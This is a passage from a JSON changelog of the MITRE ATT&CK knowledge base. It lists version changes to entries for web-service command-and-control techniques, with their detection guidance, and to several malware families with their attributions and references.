\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1102/002", + "external_id": "T1102.002" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). 
User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:51.598000+00:00\", \"old_value\": \"2025-04-15 19:59:03.009000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1021: Restrict Web-Based Content", + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-14 22:24:21.841000+00:00", + "modified": "2025-04-25 14:48:36.031000+00:00", + "name": "Dead Drop Resolver", + "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. 
Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1102/001", + "external_id": "T1102.001" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. 
User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:36.031000+00:00\", \"old_value\": \"2025-04-15 19:59:22.651000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1021: Restrict Web-Based Content", + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-14 22:45:52.963000+00:00", + "modified": "2025-04-25 14:47:30.432000+00:00", + "name": "One-Way Communication", + "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. 
Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1102/003", + "external_id": "T1102.003" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. 
User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:30.432000+00:00\", \"old_value\": \"2025-04-15 19:58:53.389000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1021: Restrict Web-Based Content", + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "software": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "malware", + "id": "malware--7bec698a-7e20-4fd3-bb6a-12787770fb1a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:44.131000+00:00", + "modified": "2025-04-25 14:43:49.838000+00:00", + "name": "3PARA RAT", + "description": "[3PARA RAT](https://attack.mitre.org/software/S0066) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024). 
(Citation: CrowdStrike Putter Panda)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0066", + "external_id": "S0066" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "3PARA RAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:49.838000+00:00\", \"old_value\": \"2025-04-16 20:38:18.768000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--8e461ca3-0996-4e6e-a0df-e2a5bbc51ebc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:43.664000+00:00", + "modified": "2025-04-25 14:44:01.375000+00:00", + "name": "4H RAT", + "description": "[4H RAT](https://attack.mitre.org/software/S0065) is malware that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024) since at least 2007. 
(Citation: CrowdStrike Putter Panda)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0065", + "external_id": "S0065" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "4H RAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:01.375000+00:00\", \"old_value\": \"2025-04-16 20:38:22.132000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-10 16:58:56.032000+00:00", + "modified": "2025-04-25 14:44:14.945000+00:00", + "name": "ABK", + "description": "[ABK](https://attack.mitre.org/software/S0469) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0469", + "external_id": "S0469" + }, + { + "source_name": "Trend Micro Tick November 2019", + "description": "Chen, 
J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.", + "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ABK" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:14.945000+00:00\", \"old_value\": \"2025-04-16 20:38:27.718000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--fb575479-14ef-41e9-bfab-0b7cf10bec73", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:34.648000+00:00", + "modified": "2025-04-25 14:45:09.488000+00:00", + "name": "ADVSTORESHELL", + "description": "[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is a spying backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 2)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0045", + "external_id": "S0045" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). 
Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "ESET Sednit Part 2", + "description": "ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ADVSTORESHELL", + "AZZY", + "EVILTOSS", + "NETUI", + "Sedreco" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:09.488000+00:00\", \"old_value\": \"2025-04-16 20:38:45.086000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--40d3e230-ed32-469f-ba89-be70cc08ab39", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:59.153000+00:00", + "modified": "2025-04-25 14:43:05.955000+00:00", + "name": "Agent.btz", + "description": "[Agent.btz](https://attack.mitre.org/software/S0092) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. (Citation: Securelist Agent.btz)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0092", + "external_id": "S0092" + }, + { + "source_name": "Securelist Agent.btz", + "description": "Gostev, A.. 
(2014, March 12). Agent.btz: a Source of Inspiration?. Retrieved April 8, 2016.", + "url": "https://securelist.com/agent-btz-a-source-of-inspiration/58551/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Agent.btz" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:05.955000+00:00\", \"old_value\": \"2025-04-16 20:38:03.857000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--295721d2-ee20-4fa3-ade3-37f4146b4570", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-10 14:53:49.448000+00:00", + "modified": "2025-04-25 14:42:53.967000+00:00", + "name": "AppleSeed", + "description": "[AppleSeed](https://attack.mitre.org/software/S0622) is a backdoor that has been used by [Kimsuky](https://attack.mitre.org/groups/G0094) to target South Korean government, academic, and commercial targets since at least 2021.(Citation: Malwarebytes Kimsuky June 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0622", + "external_id": "S0622" + }, + { + "source_name": "Malwarebytes Kimsuky June 2021", + "description": "Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. 
Retrieved June 10, 2021.", + "url": "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "AppleSeed" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:53.967000+00:00\", \"old_value\": \"2025-04-16 20:37:59.641000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--f5352566-1a64-49ac-8f7f-97e1d1a03300", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:14.551000+00:00", + "modified": "2025-04-25 14:45:05.203000+00:00", + "name": "AutoIt backdoor", + "description": "[AutoIt backdoor](https://attack.mitre.org/software/S0129) is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. (Citation: Forcepoint Monsoon) This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0129", + "external_id": "S0129" + }, + { + "source_name": "Forcepoint Monsoon", + "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. 
Retrieved September 22, 2016.", + "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "AutoIt backdoor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:05.203000+00:00\", \"old_value\": \"2025-04-16 20:38:43.395000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--58c5a3a1-928f-4094-9e98-a5a4e56dd5f3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-23 19:38:33.073000+00:00", + "modified": "2025-04-25 14:43:26.180000+00:00", + "name": "Avaddon", + "description": "[Avaddon](https://attack.mitre.org/software/S0640) is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.(Citation: Awake Security Avaddon)(Citation: Arxiv Avaddon Feb 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0640", + "external_id": "S0640" + }, + { + "source_name": "Awake Security Avaddon", + "description": "Gahlot, A. (n.d.). Threat Hunting for Avaddon Ransomware. Retrieved August 19, 2021.", + "url": "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/" + }, + { + "source_name": "Arxiv Avaddon Feb 2021", + "description": "Yuste, J. Pastrana, S. (2021, February 9). Avaddon ransomware: an in-depth analysis and decryption of infected systems. 
Retrieved August 19, 2021.", + "url": "https://arxiv.org/pdf/2102.04796.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Avaddon" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matt Brenton, Zurich Global Information Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:26.180000+00:00\", \"old_value\": \"2025-04-16 20:38:10.078000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0945a1a5-a79a-47c8-9079-10c16cdfcb5d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2023-01-11 21:17:36.149000+00:00", + "modified": "2025-04-21 19:40:47.538000+00:00", + "name": "AvosLocker", + "description": "[AvosLocker](https://attack.mitre.org/software/S1053) is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. 
As of March 2022, [AvosLocker](https://attack.mitre.org/software/S1053) had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Trend Micro AvosLocker Apr 2022)(Citation: Joint CSA AvosLocker Mar 2022)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1053", + "external_id": "S1053" + }, + { + "source_name": "Joint CSA AvosLocker Mar 2022", + "description": "FBI, FinCEN, Treasury. (2022, March 17). Indicators of Compromise Associated with AvosLocker Ransomware. Retrieved January 11, 2023.", + "url": "https://www.ic3.gov/Media/News/2022/220318.pdf" + }, + { + "source_name": "Malwarebytes AvosLocker Jul 2021", + "description": "Hasherezade. (2021, July 23). AvosLocker enters the ransomware scene, asks for partners. Retrieved January 11, 2023.", + "url": "https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners" + }, + { + "source_name": "Trend Micro AvosLocker Apr 2022", + "description": "Trend Micro Research. (2022, April 4). Ransomware Spotlight AvosLocker. 
Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "AvosLocker" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Fl\u00e1vio Costa, @Seguran\u00e7a Descomplicada" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-21 19:40:47.538000+00:00\", \"old_value\": \"2025-04-16 20:37:54.114000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Fl\\u00e1vio Costa, @Seguran\\u00e7a Descomplicada\", \"old_value\": \"Flavio Costa, Cisco\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--9dbdadb6-fdbf-490f-a35f-38762d06a0d2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:12.926000+00:00", + "name": "BADCALL", + "description": "[BADCALL](https://attack.mitre.org/software/S0245) is a Trojan malware variant used by the group [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT BADCALL)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0245", + "external_id": "S0245" + }, + { + "source_name": "BADCALL", + "description": "(Citation: US-CERT BADCALL)" + }, + { + "source_name": "US-CERT BADCALL", + "description": "US-CERT. (2018, February 06). Malware Analysis Report (MAR) - 10135536-G. 
Retrieved June 7, 2018.", + "url": "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BADCALL" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:12.926000+00:00\", \"old_value\": \"2025-04-16 20:38:26.720000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--57d83eac-a2ea-42b0-a7b2-c80c55157790", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-26 18:49:41.155000+00:00", + "modified": "2025-04-25 14:43:25.093000+00:00", + "name": "BADFLICK", + "description": "[BADFLICK](https://attack.mitre.org/software/S0642) is a backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065) in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.(Citation: FireEye Periscope March 2018)(Citation: Accenture MUDCARP March 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0642", + "external_id": "S0642" + }, + { + "source_name": "FireEye Periscope March 2018", + "description": "FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. 
Retrieved April 11, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + }, + { + "source_name": "Accenture MUDCARP March 2019", + "description": "Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.", + "url": "https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BADFLICK" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:25.093000+00:00\", \"old_value\": \"2025-04-16 20:38:09.558000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--e9595678-d269-469e-ae6b-75e49259de63", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:14.118000+00:00", + "modified": "2025-04-25 